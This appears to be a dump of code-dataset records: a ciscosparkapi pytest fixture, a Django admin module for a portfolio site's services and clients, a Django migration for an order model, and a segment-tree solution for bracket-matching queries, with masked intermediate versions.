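# api.people.me() exposes an `id` attribute, as ciscosparkapi Person
# objects do.
def test_me_has_id(me):
    assert me.id is not None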
|
normal
|
{
"blob_id": "9b7ffa2bb62a8decbec51c6bdea38b4338726816",
"index": 1891,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected](scope='session')\ndef me(api):\n return api.people.me()\n",
"step-3": "<mask token>\nimport pytest\nimport ciscosparkapi\nfrom tests.utils import create_string\n\n\[email protected](scope='session')\ndef me(api):\n return api.people.me()\n",
"step-4": "# -*- coding: utf-8 -*-\n\n\"\"\"pytest People functions, fixtures and tests.\"\"\"\n\n\nimport pytest\n\nimport ciscosparkapi\nfrom tests.utils import create_string\n\n\n# Helper Functions\n\n\n\n\n# pytest Fixtures\n\[email protected](scope=\"session\")\ndef me(api):\n return api.people.me()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#coding=utf-8
'''
Created on 04/09/2012
@author: Johnny
'''
from ckeditor.widgets import CKEditorWidget
from django.conf.urls import patterns, url
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.templatetags.static import static
import views
from portfolio.models import *
from custom_admin import custom_admin
from custom_admin.custom_model_admin import CustomModelAdmin
from django import forms
class CaracteristicaServicoAdmin(CustomModelAdmin):
list_display = ('descricao',)
search_fields = ['descricao']
exclude = ['slug']
class ServicoForm(forms.ModelForm):
descricao = forms.CharField(widget=CKEditorWidget())
class Meta:
model = Servico
class ServicosAdmin(CustomModelAdmin):
list_display = ('imagem_icone','titulo','intro',)
list_display_links = ('titulo','intro',)
search_fields = ['titulo','intro','descricao']
list_filter = ['caracteristicas']
exclude = ['slug']
form = ServicoForm
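    # Renders a one-off "settings" form for the services page: the page text
    # and image are stored on a single TextoPagina row keyed by the slug
    # 'texto_servico', created on first save and updated on later submissions.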
def configuracoes_servicos_view(self,request):
import forms
from string import capitalize
from django.utils.encoding import force_unicode
from django.contrib.admin import helpers
model = self.model
opts = model._meta
prepopuled_fields = {}
add, change = True,False
if request.method == 'POST': # If the form has been submitted...
form = forms.ConfigServicoForm(request.POST,request.FILES) # A form bound to the POST data
if request.POST.has_key('_update'):
form.fields['imagem'].required = False
if form.is_valid(): # All validation rules pass
form.fields['imagem'].required = True
try:
texto = TextoPagina.objects.get(slug='texto_servico')
except:
texto = TextoPagina()
if texto.texto == None or texto.texto != form.cleaned_data['texto']:
texto.texto = form.cleaned_data['texto']
if not request.POST.has_key('_update') or request.FILES.has_key('imagem'):
texto.imagem = request.FILES['imagem']
texto.slug = 'texto_servico'
texto.save()
form = forms.ConfigServicoForm()
form.initial['texto'] = texto.texto
form.initial['imagem'] = texto.imagem
change = True
add = False
else:
form = forms.ConfigServicoForm()
try:
texto = TextoPagina.objects.get(slug='texto_servico')
change = True
add = False
form.initial['texto'] = texto.texto
form.initial['imagem'] = texto.imagem
except:
pass
adminForm = helpers.AdminForm(form,[('Texto da página de serviços',{'fields':['imagem','texto']})],prepopuled_fields)
media = self.media + adminForm.media
return render_to_response('admin/config_form.html',
{
'add':add,
'change':change,
'title': 'Configurações',
'is_popup': "_popup" in request.REQUEST,
'show_delete': False,
'has_delete_permission':False,
'has_add_permission':True,
'has_change_permission':True,
'errors': form.errors,
'app_label': opts.app_label,
'current_app':capitalize(opts.app_label),
'all_app_list':self.admin_site.all_app_list(request),
'module_name': force_unicode(opts.verbose_name_plural),
'opts':opts,
'has_file_field':True,
'adminform':adminForm,
'save_as':False,
'media':media,
}
,context_instance=RequestContext(request))
def get_urls(self):
urls = super(ServicosAdmin, self).get_urls()
info = self.model._meta.app_label, self.model._meta.module_name
my_urls = patterns('',
url(r'^config/$', custom_admin.custom_site.admin_view(self.configuracoes_servicos_view),name='%s_%s_config' % info),
)
return my_urls + urls
@property
def media(self):
super_media = super(ServicosAdmin, self).media
js = [
'cufon-yui.js',
'TitilliumText.font.js',
'cufon-replace-ckeditor.js',
]
current_media = forms.Media(js=[static('js/%s' % url) for url in js])
media = super_media + current_media
return media
def get_model_perms(self, request):
permiss = super(ServicosAdmin, self).get_model_perms(request)
permiss['config'] = self.has_change_permission(request) and self.has_add_permission(request)
return permiss
class ClientesAdmin(CustomModelAdmin):
list_display = ('imagem_icone','descricao','site')
list_display_links = ('descricao',)
search_fields = ['site','descricao']
exclude = ['slug']
class TrabalhoForm(forms.ModelForm):
descricao = forms.CharField(widget=CKEditorWidget())
class Meta:
model = Trabalho
class TrabalhoAdmin(CustomModelAdmin):
list_display = ('titulo','descricao_pequena','servico','cliente')
search_fields = ['titulo']
list_filter = ['servico']
exclude = ['slug']
custom_admin.custom_site.register(Cliente,ClientesAdmin)
custom_admin.custom_site.register(CaracteristicaServico,CaracteristicaServicoAdmin)
custom_admin.custom_site.register(Servico,ServicosAdmin)
custom_admin.custom_site.register(Trabalho,TrabalhoAdmin)
|
normal
|
{
"blob_id": "caac9dfc7d52607c2af67ddc03a3a7bdae9911bb",
"index": 8204,
"step-1": "<mask token>\n\n\nclass ServicoForm(forms.ModelForm):\n <mask token>\n\n\n class Meta:\n model = Servico\n\n\nclass ServicosAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'titulo', 'intro'\n list_display_links = 'titulo', 'intro'\n search_fields = ['titulo', 'intro', 'descricao']\n list_filter = ['caracteristicas']\n exclude = ['slug']\n form = ServicoForm\n\n def configuracoes_servicos_view(self, request):\n import forms\n from string import capitalize\n from django.utils.encoding import force_unicode\n from django.contrib.admin import helpers\n model = self.model\n opts = model._meta\n prepopuled_fields = {}\n add, change = True, False\n if request.method == 'POST':\n form = forms.ConfigServicoForm(request.POST, request.FILES)\n if request.POST.has_key('_update'):\n form.fields['imagem'].required = False\n if form.is_valid():\n form.fields['imagem'].required = True\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n except:\n texto = TextoPagina()\n if texto.texto == None or texto.texto != form.cleaned_data[\n 'texto']:\n texto.texto = form.cleaned_data['texto']\n if not request.POST.has_key('_update'\n ) or request.FILES.has_key('imagem'):\n texto.imagem = request.FILES['imagem']\n texto.slug = 'texto_servico'\n texto.save()\n form = forms.ConfigServicoForm()\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n change = True\n add = False\n else:\n form = forms.ConfigServicoForm()\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n change = True\n add = False\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n except:\n pass\n adminForm = helpers.AdminForm(form, [('Texto da página de serviços',\n {'fields': ['imagem', 'texto']})], prepopuled_fields)\n media = self.media + adminForm.media\n return render_to_response('admin/config_form.html', {'add': add,\n 'change': change, 'title': 'Configurações', 'is_popup': \n '_popup' in request.REQUEST, 'show_delete': False,\n 'has_delete_permission': False, 'has_add_permission': True,\n 'has_change_permission': True, 'errors': form.errors,\n 'app_label': opts.app_label, 'current_app': capitalize(opts.\n app_label), 'all_app_list': self.admin_site.all_app_list(\n request), 'module_name': force_unicode(opts.verbose_name_plural\n ), 'opts': opts, 'has_file_field': True, 'adminform': adminForm,\n 'save_as': False, 'media': media}, context_instance=\n RequestContext(request))\n\n def get_urls(self):\n urls = super(ServicosAdmin, self).get_urls()\n info = self.model._meta.app_label, self.model._meta.module_name\n my_urls = patterns('', url('^config/$', custom_admin.custom_site.\n admin_view(self.configuracoes_servicos_view), name=\n '%s_%s_config' % info))\n return my_urls + urls\n\n @property\n def media(self):\n super_media = super(ServicosAdmin, self).media\n js = ['cufon-yui.js', 'TitilliumText.font.js',\n 'cufon-replace-ckeditor.js']\n current_media = forms.Media(js=[static('js/%s' % url) for url in js])\n media = super_media + current_media\n return media\n\n def get_model_perms(self, request):\n permiss = super(ServicosAdmin, self).get_model_perms(request)\n permiss['config'] = self.has_change_permission(request\n ) and self.has_add_permission(request)\n return permiss\n\n\nclass ClientesAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'descricao', 'site'\n list_display_links = 'descricao',\n search_fields = ['site', 'descricao']\n exclude = ['slug']\n\n\nclass TrabalhoForm(forms.Form):\n descricao = 
forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Trabalho\n\n\nclass TrabalhoAdmin(CustomModelAdmin):\n list_display = 'titulo', 'descricao_pequena', 'servico', 'cliente'\n search_fields = ['titulo']\n list_filter = ['servico']\n exclude = ['slug']\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ServicoForm(forms.ModelForm):\n descricao = forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Servico\n\n\nclass ServicosAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'titulo', 'intro'\n list_display_links = 'titulo', 'intro'\n search_fields = ['titulo', 'intro', 'descricao']\n list_filter = ['caracteristicas']\n exclude = ['slug']\n form = ServicoForm\n\n def configuracoes_servicos_view(self, request):\n import forms\n from string import capitalize\n from django.utils.encoding import force_unicode\n from django.contrib.admin import helpers\n model = self.model\n opts = model._meta\n prepopuled_fields = {}\n add, change = True, False\n if request.method == 'POST':\n form = forms.ConfigServicoForm(request.POST, request.FILES)\n if request.POST.has_key('_update'):\n form.fields['imagem'].required = False\n if form.is_valid():\n form.fields['imagem'].required = True\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n except:\n texto = TextoPagina()\n if texto.texto == None or texto.texto != form.cleaned_data[\n 'texto']:\n texto.texto = form.cleaned_data['texto']\n if not request.POST.has_key('_update'\n ) or request.FILES.has_key('imagem'):\n texto.imagem = request.FILES['imagem']\n texto.slug = 'texto_servico'\n texto.save()\n form = forms.ConfigServicoForm()\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n change = True\n add = False\n else:\n form = forms.ConfigServicoForm()\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n change = True\n add = False\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n except:\n pass\n adminForm = helpers.AdminForm(form, [('Texto da página de serviços',\n {'fields': ['imagem', 'texto']})], prepopuled_fields)\n media = self.media + adminForm.media\n return render_to_response('admin/config_form.html', {'add': add,\n 'change': change, 'title': 'Configurações', 'is_popup': \n '_popup' in request.REQUEST, 'show_delete': False,\n 'has_delete_permission': False, 'has_add_permission': True,\n 'has_change_permission': True, 'errors': form.errors,\n 'app_label': opts.app_label, 'current_app': capitalize(opts.\n app_label), 'all_app_list': self.admin_site.all_app_list(\n request), 'module_name': force_unicode(opts.verbose_name_plural\n ), 'opts': opts, 'has_file_field': True, 'adminform': adminForm,\n 'save_as': False, 'media': media}, context_instance=\n RequestContext(request))\n\n def get_urls(self):\n urls = super(ServicosAdmin, self).get_urls()\n info = self.model._meta.app_label, self.model._meta.module_name\n my_urls = patterns('', url('^config/$', custom_admin.custom_site.\n admin_view(self.configuracoes_servicos_view), name=\n '%s_%s_config' % info))\n return my_urls + urls\n\n @property\n def media(self):\n super_media = super(ServicosAdmin, self).media\n js = ['cufon-yui.js', 'TitilliumText.font.js',\n 'cufon-replace-ckeditor.js']\n current_media = forms.Media(js=[static('js/%s' % url) for url in js])\n media = super_media + current_media\n return media\n\n def get_model_perms(self, request):\n permiss = super(ServicosAdmin, self).get_model_perms(request)\n permiss['config'] = self.has_change_permission(request\n ) and self.has_add_permission(request)\n return permiss\n\n\nclass ClientesAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'descricao', 'site'\n list_display_links = 'descricao',\n search_fields = ['site', 'descricao']\n exclude = ['slug']\n\n\nclass TrabalhoForm(forms.Form):\n 
descricao = forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Trabalho\n\n\nclass TrabalhoAdmin(CustomModelAdmin):\n list_display = 'titulo', 'descricao_pequena', 'servico', 'cliente'\n search_fields = ['titulo']\n list_filter = ['servico']\n exclude = ['slug']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CaracteristicaServicoAdmin(CustomModelAdmin):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass ServicoForm(forms.ModelForm):\n descricao = forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Servico\n\n\nclass ServicosAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'titulo', 'intro'\n list_display_links = 'titulo', 'intro'\n search_fields = ['titulo', 'intro', 'descricao']\n list_filter = ['caracteristicas']\n exclude = ['slug']\n form = ServicoForm\n\n def configuracoes_servicos_view(self, request):\n import forms\n from string import capitalize\n from django.utils.encoding import force_unicode\n from django.contrib.admin import helpers\n model = self.model\n opts = model._meta\n prepopuled_fields = {}\n add, change = True, False\n if request.method == 'POST':\n form = forms.ConfigServicoForm(request.POST, request.FILES)\n if request.POST.has_key('_update'):\n form.fields['imagem'].required = False\n if form.is_valid():\n form.fields['imagem'].required = True\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n except:\n texto = TextoPagina()\n if texto.texto == None or texto.texto != form.cleaned_data[\n 'texto']:\n texto.texto = form.cleaned_data['texto']\n if not request.POST.has_key('_update'\n ) or request.FILES.has_key('imagem'):\n texto.imagem = request.FILES['imagem']\n texto.slug = 'texto_servico'\n texto.save()\n form = forms.ConfigServicoForm()\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n change = True\n add = False\n else:\n form = forms.ConfigServicoForm()\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n change = True\n add = False\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n except:\n pass\n adminForm = helpers.AdminForm(form, [('Texto da página de serviços',\n {'fields': ['imagem', 'texto']})], prepopuled_fields)\n media = self.media + adminForm.media\n return render_to_response('admin/config_form.html', {'add': add,\n 'change': change, 'title': 'Configurações', 'is_popup': \n '_popup' in request.REQUEST, 'show_delete': False,\n 'has_delete_permission': False, 'has_add_permission': True,\n 'has_change_permission': True, 'errors': form.errors,\n 'app_label': opts.app_label, 'current_app': capitalize(opts.\n app_label), 'all_app_list': self.admin_site.all_app_list(\n request), 'module_name': force_unicode(opts.verbose_name_plural\n ), 'opts': opts, 'has_file_field': True, 'adminform': adminForm,\n 'save_as': False, 'media': media}, context_instance=\n RequestContext(request))\n\n def get_urls(self):\n urls = super(ServicosAdmin, self).get_urls()\n info = self.model._meta.app_label, self.model._meta.module_name\n my_urls = patterns('', url('^config/$', custom_admin.custom_site.\n admin_view(self.configuracoes_servicos_view), name=\n '%s_%s_config' % info))\n return my_urls + urls\n\n @property\n def media(self):\n super_media = super(ServicosAdmin, self).media\n js = ['cufon-yui.js', 'TitilliumText.font.js',\n 'cufon-replace-ckeditor.js']\n current_media = forms.Media(js=[static('js/%s' % url) for url in js])\n media = super_media + current_media\n return media\n\n def get_model_perms(self, request):\n permiss = super(ServicosAdmin, self).get_model_perms(request)\n permiss['config'] = self.has_change_permission(request\n ) and self.has_add_permission(request)\n return permiss\n\n\nclass ClientesAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'descricao', 'site'\n list_display_links = 'descricao',\n 
search_fields = ['site', 'descricao']\n exclude = ['slug']\n\n\nclass TrabalhoForm(forms.Form):\n descricao = forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Trabalho\n\n\nclass TrabalhoAdmin(CustomModelAdmin):\n list_display = 'titulo', 'descricao_pequena', 'servico', 'cliente'\n search_fields = ['titulo']\n list_filter = ['servico']\n exclude = ['slug']\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass CaracteristicaServicoAdmin(CustomModelAdmin):\n list_display = 'descricao',\n search_fields = ['descricao']\n exclude = ['slug']\n\n\nclass ServicoForm(forms.ModelForm):\n descricao = forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Servico\n\n\nclass ServicosAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'titulo', 'intro'\n list_display_links = 'titulo', 'intro'\n search_fields = ['titulo', 'intro', 'descricao']\n list_filter = ['caracteristicas']\n exclude = ['slug']\n form = ServicoForm\n\n def configuracoes_servicos_view(self, request):\n import forms\n from string import capitalize\n from django.utils.encoding import force_unicode\n from django.contrib.admin import helpers\n model = self.model\n opts = model._meta\n prepopuled_fields = {}\n add, change = True, False\n if request.method == 'POST':\n form = forms.ConfigServicoForm(request.POST, request.FILES)\n if request.POST.has_key('_update'):\n form.fields['imagem'].required = False\n if form.is_valid():\n form.fields['imagem'].required = True\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n except:\n texto = TextoPagina()\n if texto.texto == None or texto.texto != form.cleaned_data[\n 'texto']:\n texto.texto = form.cleaned_data['texto']\n if not request.POST.has_key('_update'\n ) or request.FILES.has_key('imagem'):\n texto.imagem = request.FILES['imagem']\n texto.slug = 'texto_servico'\n texto.save()\n form = forms.ConfigServicoForm()\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n change = True\n add = False\n else:\n form = forms.ConfigServicoForm()\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n change = True\n add = False\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n except:\n pass\n adminForm = helpers.AdminForm(form, [('Texto da página de serviços',\n {'fields': ['imagem', 'texto']})], prepopuled_fields)\n media = self.media + adminForm.media\n return render_to_response('admin/config_form.html', {'add': add,\n 'change': change, 'title': 'Configurações', 'is_popup': \n '_popup' in request.REQUEST, 'show_delete': False,\n 'has_delete_permission': False, 'has_add_permission': True,\n 'has_change_permission': True, 'errors': form.errors,\n 'app_label': opts.app_label, 'current_app': capitalize(opts.\n app_label), 'all_app_list': self.admin_site.all_app_list(\n request), 'module_name': force_unicode(opts.verbose_name_plural\n ), 'opts': opts, 'has_file_field': True, 'adminform': adminForm,\n 'save_as': False, 'media': media}, context_instance=\n RequestContext(request))\n\n def get_urls(self):\n urls = super(ServicosAdmin, self).get_urls()\n info = self.model._meta.app_label, self.model._meta.module_name\n my_urls = patterns('', url('^config/$', custom_admin.custom_site.\n admin_view(self.configuracoes_servicos_view), name=\n '%s_%s_config' % info))\n return my_urls + urls\n\n @property\n def media(self):\n super_media = super(ServicosAdmin, self).media\n js = ['cufon-yui.js', 'TitilliumText.font.js',\n 'cufon-replace-ckeditor.js']\n current_media = forms.Media(js=[static('js/%s' % url) for url in js])\n media = super_media + current_media\n return media\n\n def get_model_perms(self, request):\n permiss = super(ServicosAdmin, self).get_model_perms(request)\n permiss['config'] = self.has_change_permission(request\n ) and self.has_add_permission(request)\n return permiss\n\n\nclass ClientesAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'descricao', 'site'\n 
list_display_links = 'descricao',\n search_fields = ['site', 'descricao']\n exclude = ['slug']\n\n\nclass TrabalhoForm(forms.Form):\n descricao = forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Trabalho\n\n\nclass TrabalhoAdmin(CustomModelAdmin):\n list_display = 'titulo', 'descricao_pequena', 'servico', 'cliente'\n search_fields = ['titulo']\n list_filter = ['servico']\n exclude = ['slug']\n\n\n<mask token>\n",
"step-5": "#coding=utf-8\n'''\nCreated on 04/09/2012\n\n@author: Johnny\n'''\nfrom ckeditor.widgets import CKEditorWidget\nfrom django.conf.urls import patterns, url\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.templatetags.static import static\nimport views\nfrom portfolio.models import *\nfrom custom_admin import custom_admin\nfrom custom_admin.custom_model_admin import CustomModelAdmin\nfrom django import forms\n\nclass CaracteristicaServicoAdmin(CustomModelAdmin):\n list_display = ('descricao',)\n search_fields = ['descricao']\n exclude = ['slug']\n\nclass ServicoForm(forms.ModelForm):\n descricao = forms.CharField(widget=CKEditorWidget())\n class Meta:\n model = Servico\n\nclass ServicosAdmin(CustomModelAdmin):\n list_display = ('imagem_icone','titulo','intro',)\n list_display_links = ('titulo','intro',)\n search_fields = ['titulo','intro','descricao']\n list_filter = ['caracteristicas']\n exclude = ['slug']\n form = ServicoForm\n\n\n def configuracoes_servicos_view(self,request):\n import forms\n from string import capitalize\n from django.utils.encoding import force_unicode\n from django.contrib.admin import helpers\n\n model = self.model\n opts = model._meta\n prepopuled_fields = {}\n\n add, change = True,False\n\n if request.method == 'POST': # If the form has been submitted...\n\n form = forms.ConfigServicoForm(request.POST,request.FILES) # A form bound to the POST data\n\n if request.POST.has_key('_update'):\n form.fields['imagem'].required = False\n\n if form.is_valid(): # All validation rules pass\n\n form.fields['imagem'].required = True\n\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n except:\n texto = TextoPagina()\n\n if texto.texto == None or texto.texto != form.cleaned_data['texto']:\n texto.texto = form.cleaned_data['texto']\n\n if not request.POST.has_key('_update') or request.FILES.has_key('imagem'):\n texto.imagem = request.FILES['imagem']\n\n\n\n texto.slug = 'texto_servico'\n texto.save()\n\n form = forms.ConfigServicoForm()\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n\n change = True\n add = False\n else:\n form = forms.ConfigServicoForm()\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n change = True\n add = False\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n except:\n pass\n\n adminForm = helpers.AdminForm(form,[('Texto da página de serviços',{'fields':['imagem','texto']})],prepopuled_fields)\n\n media = self.media + adminForm.media\n\n return render_to_response('admin/config_form.html',\n {\n 'add':add,\n 'change':change,\n 'title': 'Configurações',\n 'is_popup': \"_popup\" in request.REQUEST,\n 'show_delete': False,\n 'has_delete_permission':False,\n 'has_add_permission':True,\n 'has_change_permission':True,\n 'errors': form.errors,\n 'app_label': opts.app_label,\n 'current_app':capitalize(opts.app_label),\n 'all_app_list':self.admin_site.all_app_list(request),\n 'module_name': force_unicode(opts.verbose_name_plural),\n 'opts':opts,\n 'has_file_field':True,\n 'adminform':adminForm,\n 'save_as':False,\n 'media':media,\n }\n ,context_instance=RequestContext(request))\n\n def get_urls(self):\n urls = super(ServicosAdmin, self).get_urls()\n info = self.model._meta.app_label, self.model._meta.module_name\n my_urls = patterns('',\n url(r'^config/$', custom_admin.custom_site.admin_view(self.configuracoes_servicos_view),name='%s_%s_config' % info),\n )\n return my_urls + urls\n\n @property\n def 
media(self):\n super_media = super(ServicosAdmin, self).media\n\n js = [\n 'cufon-yui.js',\n 'TitilliumText.font.js',\n 'cufon-replace-ckeditor.js',\n ]\n\n current_media = forms.Media(js=[static('js/%s' % url) for url in js])\n\n media = super_media + current_media\n\n return media\n\n def get_model_perms(self, request):\n permiss = super(ServicosAdmin, self).get_model_perms(request)\n permiss['config'] = self.has_change_permission(request) and self.has_add_permission(request)\n return permiss\n\nclass ClientesAdmin(CustomModelAdmin):\n list_display = ('imagem_icone','descricao','site')\n list_display_links = ('descricao',)\n search_fields = ['site','descricao']\n exclude = ['slug']\n\n\nclass TrabalhoForm(forms.Form):\n descricao = forms.CharField(widget=CKEditorWidget())\n class Meta:\n model = Trabalho\n\nclass TrabalhoAdmin(CustomModelAdmin):\n list_display = ('titulo','descricao_pequena','servico','cliente')\n search_fields = ['titulo']\n list_filter = ['servico']\n exclude = ['slug']\n\n\ncustom_admin.custom_site.register(Cliente,ClientesAdmin)\ncustom_admin.custom_site.register(CaracteristicaServico,CaracteristicaServicoAdmin)\ncustom_admin.custom_site.register(Servico,ServicosAdmin)\ncustom_admin.custom_site.register(Trabalho,TrabalhoAdmin)\n",
"step-ids": [
13,
14,
15,
16,
19
]
}
|
[
13,
14,
15,
16,
19
] |
# Generated by Django 3.2.6 on 2021-10-10 17:17
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('reward', '0002_delete_user'),
]
operations = [
migrations.CreateModel(
name='order',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, unique=True)),
('created_date', models.DateField(auto_now_add=True)),
('points', models.IntegerField(blank=True, default=0, null=True)),
('green_rating', models.CharField(choices=[('1', 'rating 1'), ('2', 'rating 2'), ('3', 'rating 3'), ('4', 'rating 4'), ('5', 'rating 5')], max_length=200)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
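# This initial migration creates the `order` table with a UUID primary key,
# an auto-set creation date, an integer points field, a one-to-five
# `green_rating` choice field, and a cascading foreign key to the active
# user model.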
|
normal
|
{
"blob_id": "8cec6778f530cb06e4f6cb2e6e9b6cb192d20f97",
"index": 3280,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('reward', '0002_delete_user')]\n operations = [migrations.CreateModel(name='order', fields=[('id',\n models.UUIDField(default=uuid.uuid4, editable=False, primary_key=\n True, serialize=False, unique=True)), ('created_date', models.\n DateField(auto_now_add=True)), ('points', models.IntegerField(blank\n =True, default=0, null=True)), ('green_rating', models.CharField(\n choices=[('1', 'rating 1'), ('2', 'rating 2'), ('3', 'rating 3'), (\n '4', 'rating 4'), ('5', 'rating 5')], max_length=200)), ('user',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL))])]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport uuid\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('reward', '0002_delete_user')]\n operations = [migrations.CreateModel(name='order', fields=[('id',\n models.UUIDField(default=uuid.uuid4, editable=False, primary_key=\n True, serialize=False, unique=True)), ('created_date', models.\n DateField(auto_now_add=True)), ('points', models.IntegerField(blank\n =True, default=0, null=True)), ('green_rating', models.CharField(\n choices=[('1', 'rating 1'), ('2', 'rating 2'), ('3', 'rating 3'), (\n '4', 'rating 4'), ('5', 'rating 5')], max_length=200)), ('user',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL))])]\n",
"step-5": "# Generated by Django 3.2.6 on 2021-10-10 17:17\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('reward', '0002_delete_user'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='order',\n fields=[\n ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, unique=True)),\n ('created_date', models.DateField(auto_now_add=True)),\n ('points', models.IntegerField(blank=True, default=0, null=True)),\n ('green_rating', models.CharField(choices=[('1', 'rating 1'), ('2', 'rating 2'), ('3', 'rating 3'), ('4', 'rating 4'), ('5', 'rating 5')], max_length=200)),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def constructST(s, start, end, st, i):
if start == end:
st[i] = 0
openst[i] = 1 if s[start] == '(' else 0
closedst[i] = 1 if s[start] == ')' else 0
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *
i + 1)
a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)
tmp = min(openst[2 * i + 1], closedst[2 * i + 2])
st[i] += tmp + a
openst[i] += b - tmp
closedst[i] += c - tmp
return st[i], openst[i], closedst[i]
def query(s, start, end, l, r, st, i):
if l > end or r < start:
return 0, 0, 0
elif start >= l and end <= r:
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)
d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)
tmp = min(b, f)
T = a + d + tmp
O = b + e - tmp
C = c + f - tmp
return T, O, C
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def constructST(s, start, end, st, i):
if start == end:
st[i] = 0
openst[i] = 1 if s[start] == '(' else 0
closedst[i] = 1 if s[start] == ')' else 0
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *
i + 1)
a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)
tmp = min(openst[2 * i + 1], closedst[2 * i + 2])
st[i] += tmp + a
openst[i] += b - tmp
closedst[i] += c - tmp
return st[i], openst[i], closedst[i]
def query(s, start, end, l, r, st, i):
if l > end or r < start:
return 0, 0, 0
elif start >= l and end <= r:
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)
d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)
tmp = min(b, f)
T = a + d + tmp
O = b + e - tmp
C = c + f - tmp
return T, O, C
<|reserved_special_token_0|>
constructST(s, 0, n - 1, st, 0)
for _ in range(int(input())):
l, r = map(int, input().split())
print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def constructST(s, start, end, st, i):
if start == end:
st[i] = 0
openst[i] = 1 if s[start] == '(' else 0
closedst[i] = 1 if s[start] == ')' else 0
return st[i], openst[i], closedst[i]
else:
mid = (start + end) // 2
st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *
i + 1)
a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)
tmp = min(openst[2 * i + 1], closedst[2 * i + 2])
st[i] += tmp + a
openst[i] += b - tmp
closedst[i] += c - tmp
return st[i], openst[i], closedst[i]
def query(s, start, end, l, r, st, i):
if l > end or r < start:
